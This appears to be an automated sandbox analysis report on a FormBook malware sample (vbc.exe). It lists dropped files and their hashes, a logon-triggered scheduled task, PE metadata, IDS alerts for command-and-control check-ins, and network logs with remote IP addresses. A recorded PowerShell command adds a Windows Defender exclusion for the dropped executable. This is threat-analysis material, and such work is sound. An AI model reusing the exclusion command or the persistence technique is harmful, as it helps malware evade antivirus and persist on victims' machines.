                                            Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21
                                            C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):22284
                                            Entropy (8bit):5.353881910568184
                                            Encrypted:false
                                            SSDEEP:384:ItCDbSTnJDrnVXf1JNcbnusm7u5c+Ohhbm1dOYlw4aC:DyJ/npXS7usw8c+gbqflT
                                            MD5:0D67EDF91C635D7850EF610BA3B6E80E
                                            SHA1:4E3C716CEB41805F4EBEC8E01E2D69660457AF54
                                            SHA-256:A6D8C87A3E4DA7C3B5B97E35199A28779B014EFAC9AD41187D1C4BD15B66299D
                                            SHA-512:7792499CA1DF9740430C00C695D4D981015FCAC4514F27F60824262CECB1330B68070722233CB1026B1AEBE4D8343370A1051C20500A532C536AB72B9FE36B45
                                            Malicious:false
                                            Reputation:low
                                            Preview: @...e...........|.......h.....w.t.....y...I..........@..........D...............fZve...F.....x.)........System.Management.AutomationH...............<@.^.L."My...:R..... .Microsoft.PowerShell.ConsoleHost4...............[...{a.C..%6..h.........System.Core.0...............G-.o...A...4B..........System..4................Zg5..:O..g..q..........System.Xml..L...............7.....J@......~.......#.Microsoft.Management.Infrastructure.8................'....L..}............System.Numerics.@................Lo...QN......<Q........System.DirectoryServices<................H..QN.Y.f............System.Management...4....................].D.E.....#.......System.Data.H................. ....H..m)aUu.........Microsoft.PowerShell.Security...<.................~.[L.D.Z.>..m.........System.Transactions.<................):gK..G...$.1.q........System.ConfigurationP................./.C..J..%...].......%.Microsoft.PowerShell.Commands.Utility...D..................-.D.F.<;.nt.1........System.Configuration.Ins
                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lq3sbvzj.wru.psm1
                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:very short file (no magic)
                                            Category:dropped
                                            Size (bytes):1
                                            Entropy (8bit):0.0
                                            Encrypted:false
                                            SSDEEP:3:U:U
                                            MD5:C4CA4238A0B923820DCC509A6F75849B
                                            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                            Malicious:false
                                            Preview: 1
                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nn4teh0l.j21.ps1
                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:very short file (no magic)
                                            Category:dropped
                                            Size (bytes):1
                                            Entropy (8bit):0.0
                                            Encrypted:false
                                            SSDEEP:3:U:U
                                            MD5:C4CA4238A0B923820DCC509A6F75849B
                                            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                            Malicious:false
                                            Preview: 1
                                            C:\Users\user\AppData\Local\Temp\tmpAA68.tmp
                                            Process:C:\Users\user\Desktop\vbc.exe
                                            File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                            Category:dropped
                                            Size (bytes):1663
                                            Entropy (8bit):5.177504026201777
                                            Encrypted:false
                                            SSDEEP:24:2dH4+SEqC/dp7hdMlNMFpdU/rlMhEMjnGpwjpIgUYODOLD9RJh7h8gKBFtn:cbhH7MlNQ8/rydbz9I3YODOLNdq3t
                                            MD5:E7C4E7B70996F6294F5F000C26736157
                                            SHA1:44691C6732ED527445581CE7953F35BA9FB57A0C
                                            SHA-256:241672A3BAC2F63F1BD79B1F48B7C1F5B4F2D471652EFA5D367549DB7E85E084
                                            SHA-512:7C28CFD9CF220B143D08741D0BF601D06328508AD571D9258C456BF0FBD4A7B9E7E9648A7C1913834AD6915AB80DE265ED59BE81292BE32EA3535781E5AE5B00
                                            Malicious:true
                                            Preview: <?xml version="1.0" encoding="UTF-16"?>..<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">.. <RegistrationInfo>.. <Date>2014-10-25T14:27:44.8929027</Date>.. <Author>computer\user</Author>.. </RegistrationInfo>.. <Triggers>.. <LogonTrigger>.. <Enabled>true</Enabled>.. <UserId>computer\user</UserId>.. </LogonTrigger>.. <RegistrationTrigger>.. <Enabled>false</Enabled>.. </RegistrationTrigger>.. </Triggers>.. <Principals>.. <Principal id="Author">.. <UserId>computer\user</UserId>.. <LogonType>InteractiveToken</LogonType>.. <RunLevel>LeastPrivilege</RunLevel>.. </Principal>.. </Principals>.. <Settings>.. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>.. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>.. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>.. <AllowHardTerminate>false</AllowHardTerminate>.. <StartWhenAv
                                            C:\Users\user\AppData\Roaming\uZlkYhlkeLeaKC.exe
                                            Process:C:\Users\user\Desktop\vbc.exe
                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                            Category:dropped
                                            Size (bytes):368640
                                            Entropy (8bit):7.907277852559704
                                            Encrypted:false
                                            SSDEEP:6144:hC9EDghMkMs4P2CW2RT9cERCtbjqg2vcy8a9KI75uhPLTDcfAYGQLomQVHb:h1DghTjPymtvqg4ya9R75AzOAcomQV7
                                            MD5:C4A1BDD685E346B7604F93357A922875
                                            SHA1:6B8FCCADCF1977F5850FAA1C47617343FAFC0FF4
                                            SHA-256:728B23F75C1140A1763DD7C75083F2AE57AFEB6FFA3D7B33A9BA1B4904C4566D
                                            SHA-512:15FD260D342AB48A0A23293EE49DC50150B0EDAABF869F9E2A80BB7946FE5483CB4D89037352AD76008FFCA703B93A68361F1D4FFD1E09F37996D5DF47BC6CA3
                                            Malicious:true
                                            Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...(-.a................................. ........@.. ....................................@.....................................K.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B.......................H.......Xe...X..........`...V............................................0..:.......+.&.+.&. ....8............s....}.....s....}.... ....(4...:....&..%.."...s....}......|.....|....(#......|.....|....(#... .....:T...&. .'..}.... ....(5...99...&.(3...8....& ....8".......}......}....8I... ............E................................@...9... ....8.......}..... ,...}.....(5...:....& ....(4...:....&.*...+.&..{....*2+.&...}....*....0..........+.&....8.....*...+.&..{....*2+.&...}....
                                            C:\Users\user\AppData\Roaming\uZlkYhlkeLeaKC.exe:Zone.Identifier
                                            Process:C:\Users\user\Desktop\vbc.exe
                                            File Type:ASCII text, with CRLF line terminators
                                            Category:dropped
                                            Size (bytes):26
                                            Entropy (8bit):3.95006375643621
                                            Encrypted:false
                                            SSDEEP:3:ggPYV:rPYV
                                            MD5:187F488E27DB4AF347237FE461A079AD
                                            SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                            SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                            SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                            Malicious:false
                                            Preview: [ZoneTransfer]....ZoneId=0
                                            C:\Users\user\Documents\20211109\PowerShell_transcript.921702.y9Ja5PCc.20211109125606.txt
                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                            Category:dropped
                                            Size (bytes):5845
                                            Entropy (8bit):5.388652589278563
                                            Encrypted:false
                                            SSDEEP:96:BZQ6VN2qDo1ZNZ96VN2qDo1ZDTdLjZP6VN2qDo1ZwmbbhZm:l
                                            MD5:5428FD441DF4A369B3F10ABABA0933E5
                                            SHA1:8BCE64310E0A65B24558C7C05A99177624050540
                                            SHA-256:27FE637C478154A60944EC3E45F92277C28630985AFEC17CB104516F4970C5E8
                                            SHA-512:C7799055AD9994136A3B1AC72BFB37FC1AD79E58A24C5BEBE771444BAEE810AB50D11609305E6F8017B21188C027824D54920A516801399B92D78124B358BF28
                                            Malicious:false
                                            Preview: .**********************..Windows PowerShell transcript start..Start time: 20211109125607..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 921702 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath C:\Users\user\AppData\Roaming\uZlkYhlkeLeaKC.exe..Process ID: 6604..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20211109125607..**********************..PS>Add-MpPreference -ExclusionPath C:\Users\user\AppData\Roaming\uZlkYhlkeLeaKC.exe..**********************..Windows PowerShell transcript start..Start time: 20211109130015..Username: computer\user..RunA

                                            Static File Info

                                            General

                                            File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                            Entropy (8bit):7.907277852559704
                                            TrID:
                                            • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                            • Win32 Executable (generic) a (10002005/4) 49.78%
                                            • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                            • Generic Win/DOS Executable (2004/3) 0.01%
                                            • DOS Executable Generic (2002/1) 0.01%
                                            File name:vbc.exe
                                            File size:368640
                                            MD5:c4a1bdd685e346b7604f93357a922875
                                            SHA1:6b8fccadcf1977f5850faa1c47617343fafc0ff4
                                            SHA256:728b23f75c1140a1763dd7c75083f2ae57afeb6ffa3d7b33a9ba1b4904c4566d
                                            SHA512:15fd260d342ab48a0a23293ee49dc50150b0edaabf869f9e2a80bb7946fe5483cb4d89037352ad76008ffca703b93a68361f1d4ffd1e09f37996d5df47bc6ca3
                                            SSDEEP:6144:hC9EDghMkMs4P2CW2RT9cERCtbjqg2vcy8a9KI75uhPLTDcfAYGQLomQVHb:h1DghTjPymtvqg4ya9R75AzOAcomQV7
                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...(-.a................................. ........@.. ....................................@................................

                                            File Icon

                                            Icon Hash:00828e8e8686b000

                                            General

                                            Entrypoint:0x45b50e
                                            Entrypoint Section:.text
                                            Digitally signed:false
                                            Imagebase:0x400000
                                            Subsystem:windows gui
                                            Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED
                                            DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                            Time Stamp:0x618A2D28 [Tue Nov 9 08:11:20 2021 UTC]
                                            TLS Callbacks:
                                            CLR (.Net) Version:v4.0.30319
                                            OS Version Major:4
                                            OS Version Minor:0
                                            File Version Major:4
                                            File Version Minor:0
                                            Subsystem Version Major:4
                                            Subsystem Version Minor:0
                                            Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                            Instruction
                                            jmp dword ptr [00402000h]
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            NameVirtual AddressVirtual Size Is in Section
                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                            IMAGE_DIRECTORY_ENTRY_IMPORT0x5b4c00x4b.text
                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0x5c0000x5d8.rsrc
                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x5e0000xc.reloc
                                            IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                            IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                            NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                            .text0x20000x595140x59600False0.893217329545data7.9203967863IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                            .rsrc0x5c0000x5d80x600False0.431640625data4.16950249458IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                            .reloc0x5e0000xc0x200False0.044921875data0.101910425663IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                            NameRVASizeTypeLanguageCountry
                                            RT_VERSION0x5c0a00x34cdata
                                            RT_MANIFEST0x5c3ec0x1eaXML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                            DLLImport
                                            mscoree.dll_CorExeMain
                                            DescriptionData
                                            Translation0x0000 0x04b0
                                            LegalCopyrightCopyright usda 2011
                                            Assembly Version1.0.0.0
                                            InternalNameICollecti.exe
                                            FileVersion1.0.0.0
                                            CompanyNameusda
                                            LegalTrademarks
                                            Comments
                                            ProductNameHidLib.SampleApp
                                            ProductVersion1.0.0.0
                                            FileDescriptionHidLib.SampleApp
                                            OriginalFilenameICollecti.exe

                                            Network Behavior

                                            Snort IDS Alerts

                                            TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                            11/09/21-12:57:17.665894TCP2031453ET TROJAN FormBook CnC Checkin (GET)4979480192.168.2.744.227.65.245
                                            11/09/21-12:57:17.665894TCP2031449ET TROJAN FormBook CnC Checkin (GET)4979480192.168.2.744.227.65.245
                                            11/09/21-12:57:17.665894TCP2031412ET TROJAN FormBook CnC Checkin (GET)4979480192.168.2.744.227.65.245
                                            11/09/21-12:57:29.013759TCP2031453ET TROJAN FormBook CnC Checkin (GET)4981680192.168.2.7172.67.188.247
                                            11/09/21-12:57:29.013759TCP2031449ET TROJAN FormBook CnC Checkin (GET)4981680192.168.2.7172.67.188.247
                                            11/09/21-12:57:29.013759TCP2031412ET TROJAN FormBook CnC Checkin (GET)4981680192.168.2.7172.67.188.247
                                            11/09/21-12:57:34.283009TCP1201ATTACK-RESPONSES 403 Forbidden804981834.102.136.180192.168.2.7
                                            11/09/21-12:57:39.595240TCP2031453ET TROJAN FormBook CnC Checkin (GET)4982180192.168.2.7101.132.116.91
                                            11/09/21-12:57:39.595240TCP2031449ET TROJAN FormBook CnC Checkin (GET)4982180192.168.2.7101.132.116.91
                                            11/09/21-12:57:39.595240TCP2031412ET TROJAN FormBook CnC Checkin (GET)4982180192.168.2.7101.132.116.91
                                            11/09/21-12:57:48.252391ICMP402ICMP Destination Unreachable Port Unreachable192.168.2.78.8.8.8
                                            11/09/21-12:57:49.299373ICMP402ICMP Destination Unreachable Port Unreachable192.168.2.78.8.8.8
                                            11/09/21-12:58:02.641444TCP1201ATTACK-RESPONSES 403 Forbidden804984834.102.136.180192.168.2.7
                                            11/09/21-12:58:08.507989TCP1201ATTACK-RESPONSES 403 Forbidden8049850103.118.81.108192.168.2.7
                                            11/09/21-12:58:13.678079TCP1201ATTACK-RESPONSES 403 Forbidden804985134.102.136.180192.168.2.7

                                            Network Port Distribution

                                            • Total Packets: 57
                                            • 80 (HTTP)
                                            • 53 (DNS)
                                            TimestampSource PortDest PortSource IPDest IP
                                            Nov 9, 2021 12:57:17.263117075 CET4979480192.168.2.744.227.65.245
                                            Nov 9, 2021 12:57:17.464613914 CET804979444.227.65.245192.168.2.7
                                            Nov 9, 2021 12:57:17.464808941 CET4979480192.168.2.744.227.65.245
                                            Nov 9, 2021 12:57:17.665780067 CET804979444.227.65.245192.168.2.7
                                            Nov 9, 2021 12:57:17.665894032 CET4979480192.168.2.744.227.65.245
                                            Nov 9, 2021 12:57:17.866852045 CET804979444.227.65.245192.168.2.7
                                            Nov 9, 2021 12:57:17.870632887 CET804979444.227.65.245192.168.2.7
                                            Nov 9, 2021 12:57:17.870656967 CET804979444.227.65.245192.168.2.7
                                            Nov 9, 2021 12:57:17.870831013 CET4979480192.168.2.744.227.65.245
                                            Nov 9, 2021 12:57:17.870949984 CET4979480192.168.2.744.227.65.245
                                            Nov 9, 2021 12:57:18.072505951 CET804979444.227.65.245192.168.2.7
                                            Nov 9, 2021 12:57:23.135832071 CET4981580192.168.2.7118.27.122.222
                                            Nov 9, 2021 12:57:23.410075903 CET8049815118.27.122.222192.168.2.7
                                            Nov 9, 2021 12:57:23.410485983 CET4981580192.168.2.7118.27.122.222
                                            Nov 9, 2021 12:57:23.410603046 CET4981580192.168.2.7118.27.122.222
                                            Nov 9, 2021 12:57:23.684633970 CET8049815118.27.122.222192.168.2.7
                                            Nov 9, 2021 12:57:23.685393095 CET8049815118.27.122.222192.168.2.7
                                            Nov 9, 2021 12:57:23.685415030 CET8049815118.27.122.222192.168.2.7
                                            Nov 9, 2021 12:57:23.685635090 CET4981580192.168.2.7118.27.122.222
                                            Nov 9, 2021 12:57:23.685856104 CET4981580192.168.2.7118.27.122.222
                                            Nov 9, 2021 12:57:23.959731102 CET8049815118.27.122.222192.168.2.7
                                            Nov 9, 2021 12:57:28.980609894 CET4981680192.168.2.7172.67.188.247
                                            Nov 9, 2021 12:57:29.008771896 CET8049816172.67.188.247192.168.2.7
                                            Nov 9, 2021 12:57:29.008956909 CET4981680192.168.2.7172.67.188.247
                                            Nov 9, 2021 12:57:29.013758898 CET4981680192.168.2.7172.67.188.247
                                            Nov 9, 2021 12:57:29.041816950 CET8049816172.67.188.247192.168.2.7
                                            Nov 9, 2021 12:57:29.071464062 CET8049816172.67.188.247192.168.2.7
                                            Nov 9, 2021 12:57:29.071500063 CET8049816172.67.188.247192.168.2.7
                                            Nov 9, 2021 12:57:29.071659088 CET4981680192.168.2.7172.67.188.247
                                            Nov 9, 2021 12:57:29.071784973 CET4981680192.168.2.7172.67.188.247
                                            Nov 9, 2021 12:57:29.099801064 CET8049816172.67.188.247192.168.2.7
                                            Nov 9, 2021 12:57:34.146682978 CET4981880192.168.2.734.102.136.180
                                            Nov 9, 2021 12:57:34.165709019 CET804981834.102.136.180192.168.2.7
                                            Nov 9, 2021 12:57:34.168278933 CET4981880192.168.2.734.102.136.180
                                            Nov 9, 2021 12:57:34.168477058 CET4981880192.168.2.734.102.136.180
                                            Nov 9, 2021 12:57:34.187295914 CET804981834.102.136.180192.168.2.7
                                            Nov 9, 2021 12:57:34.283009052 CET804981834.102.136.180192.168.2.7
                                            Nov 9, 2021 12:57:34.283037901 CET804981834.102.136.180192.168.2.7
                                            Nov 9, 2021 12:57:34.283171892 CET4981880192.168.2.734.102.136.180
                                            Nov 9, 2021 12:57:34.283231020 CET4981880192.168.2.734.102.136.180
                                            Nov 9, 2021 12:57:34.594325066 CET4981880192.168.2.734.102.136.180
                                            Nov 9, 2021 12:57:34.613336086 CET804981834.102.136.180192.168.2.7
                                            Nov 9, 2021 12:57:39.346448898 CET4982180192.168.2.7101.132.116.91
                                            Nov 9, 2021 12:57:39.594898939 CET8049821101.132.116.91192.168.2.7
                                            Nov 9, 2021 12:57:39.595088959 CET4982180192.168.2.7101.132.116.91
                                            Nov 9, 2021 12:57:39.595240116 CET4982180192.168.2.7101.132.116.91
                                            Nov 9, 2021 12:57:40.121010065 CET4982180192.168.2.7101.132.116.91
                                            Nov 9, 2021 12:57:40.172657967 CET4982180192.168.2.7101.132.116.91
                                            Nov 9, 2021 12:57:40.386682034 CET8049821101.132.116.91192.168.2.7
                                            Nov 9, 2021 12:57:40.442859888 CET8049821101.132.116.91192.168.2.7
                                            Nov 9, 2021 12:57:40.442886114 CET8049821101.132.116.91192.168.2.7
                                            Nov 9, 2021 12:57:40.443016052 CET4982180192.168.2.7101.132.116.91
                                            Nov 9, 2021 12:57:40.443337917 CET4982180192.168.2.7101.132.116.91
                                            Nov 9, 2021 12:57:57.405693054 CET4984780192.168.2.7104.21.4.114
                                            Nov 9, 2021 12:57:57.422708988 CET8049847104.21.4.114192.168.2.7
                                            Nov 9, 2021 12:57:57.422836065 CET4984780192.168.2.7104.21.4.114
                                            Nov 9, 2021 12:57:57.423017979 CET4984780192.168.2.7104.21.4.114
                                            Nov 9, 2021 12:57:57.441745043 CET8049847104.21.4.114192.168.2.7
                                            Nov 9, 2021 12:57:57.453866005 CET8049847104.21.4.114192.168.2.7
                                            Nov 9, 2021 12:57:57.453880072 CET8049847104.21.4.114192.168.2.7
                                            Nov 9, 2021 12:57:57.454087973 CET4984780192.168.2.7104.21.4.114
                                            Nov 9, 2021 12:57:57.454360962 CET4984780192.168.2.7104.21.4.114
                                            Nov 9, 2021 12:57:57.472325087 CET8049847104.21.4.114192.168.2.7
                                            Nov 9, 2021 12:58:02.506881952 CET4984880192.168.2.734.102.136.180
                                            Nov 9, 2021 12:58:02.525774956 CET804984834.102.136.180192.168.2.7
                                            Nov 9, 2021 12:58:02.526007891 CET4984880192.168.2.734.102.136.180
                                            Nov 9, 2021 12:58:02.526216030 CET4984880192.168.2.734.102.136.180
                                            Nov 9, 2021 12:58:02.547923088 CET804984834.102.136.180192.168.2.7
                                            Nov 9, 2021 12:58:02.641443968 CET804984834.102.136.180192.168.2.7
                                            Nov 9, 2021 12:58:02.641474962 CET804984834.102.136.180192.168.2.7
                                            Nov 9, 2021 12:58:02.641747952 CET4984880192.168.2.734.102.136.180
                                            Nov 9, 2021 12:58:02.641813040 CET4984880192.168.2.734.102.136.180
                                            Nov 9, 2021 12:58:02.660756111 CET804984834.102.136.180192.168.2.7
                                            Nov 9, 2021 12:58:13.543569088 CET4985180192.168.2.734.102.136.180
                                            Nov 9, 2021 12:58:13.562455893 CET804985134.102.136.180192.168.2.7
                                            Nov 9, 2021 12:58:13.562738895 CET4985180192.168.2.734.102.136.180
                                            Nov 9, 2021 12:58:13.562832117 CET4985180192.168.2.734.102.136.180
                                            Nov 9, 2021 12:58:13.581716061 CET804985134.102.136.180192.168.2.7
                                            Nov 9, 2021 12:58:13.678078890 CET804985134.102.136.180192.168.2.7
                                            Nov 9, 2021 12:58:13.678164005 CET804985134.102.136.180192.168.2.7
                                            Nov 9, 2021 12:58:13.678350925 CET4985180192.168.2.734.102.136.180
                                            Nov 9, 2021 12:58:13.678407907 CET4985180192.168.2.734.102.136.180
                                            Nov 9, 2021 12:58:13.698116064 CET804985134.102.136.180192.168.2.7
                                            TimestampSource PortDest PortSource IPDest IP
                                            Nov 9, 2021 12:57:17.065556049 CET6429653192.168.2.78.8.8.8
                                            Nov 9, 2021 12:57:17.257793903 CET53642968.8.8.8192.168.2.7
                                            Nov 9, 2021 12:57:22.879528999 CET4924753192.168.2.78.8.8.8
                                            Nov 9, 2021 12:57:23.134397984 CET53492478.8.8.8192.168.2.7
                                            Nov 9, 2021 12:57:28.956065893 CET5228653192.168.2.78.8.8.8
                                            Nov 9, 2021 12:57:28.979376078 CET53522868.8.8.8192.168.2.7
                                            Nov 9, 2021 12:57:34.122539997 CET6374453192.168.2.78.8.8.8
                                            Nov 9, 2021 12:57:34.145211935 CET53637448.8.8.8192.168.2.7
                                            Nov 9, 2021 12:57:39.320169926 CET5836753192.168.2.78.8.8.8
                                            Nov 9, 2021 12:57:39.345231056 CET53583678.8.8.8192.168.2.7
                                            Nov 9, 2021 12:57:45.131288052 CET6059953192.168.2.78.8.8.8
                                            Nov 9, 2021 12:57:46.126441956 CET6059953192.168.2.78.8.8.8
                                            Nov 9, 2021 12:57:47.157723904 CET6059953192.168.2.78.8.8.8
                                            Nov 9, 2021 12:57:47.272138119 CET53605998.8.8.8192.168.2.7
                                            Nov 9, 2021 12:57:48.252280951 CET53605998.8.8.8192.168.2.7
                                            Nov 9, 2021 12:57:49.299220085 CET53605998.8.8.8192.168.2.7
                                            Nov 9, 2021 12:57:52.316186905 CET5957153192.168.2.78.8.8.8
                                            Nov 9, 2021 12:57:52.362221003 CET53595718.8.8.8192.168.2.7
                                            Nov 9, 2021 12:57:57.381405115 CET5268953192.168.2.78.8.8.8
                                            Nov 9, 2021 12:57:57.404184103 CET53526898.8.8.8192.168.2.7
                                            Nov 9, 2021 12:58:02.464620113 CET5029053192.168.2.78.8.8.8
                                            Nov 9, 2021 12:58:02.505490065 CET53502908.8.8.8192.168.2.7
                                            Nov 9, 2021 12:58:07.645164967 CET5620953192.168.2.78.8.8.8
                                            Nov 9, 2021 12:58:07.974133968 CET53562098.8.8.8192.168.2.7
                                            Nov 9, 2021 12:58:13.521158934 CET5958253192.168.2.78.8.8.8
                                            Nov 9, 2021 12:58:13.542715073 CET53595828.8.8.8192.168.2.7
                                            Nov 9, 2021 12:58:18.693773031 CET6094953192.168.2.78.8.8.8
                                            Nov 9, 2021 12:58:18.740915060 CET53609498.8.8.8192.168.2.7
                                            TimestampSource IPDest IPChecksumCodeType
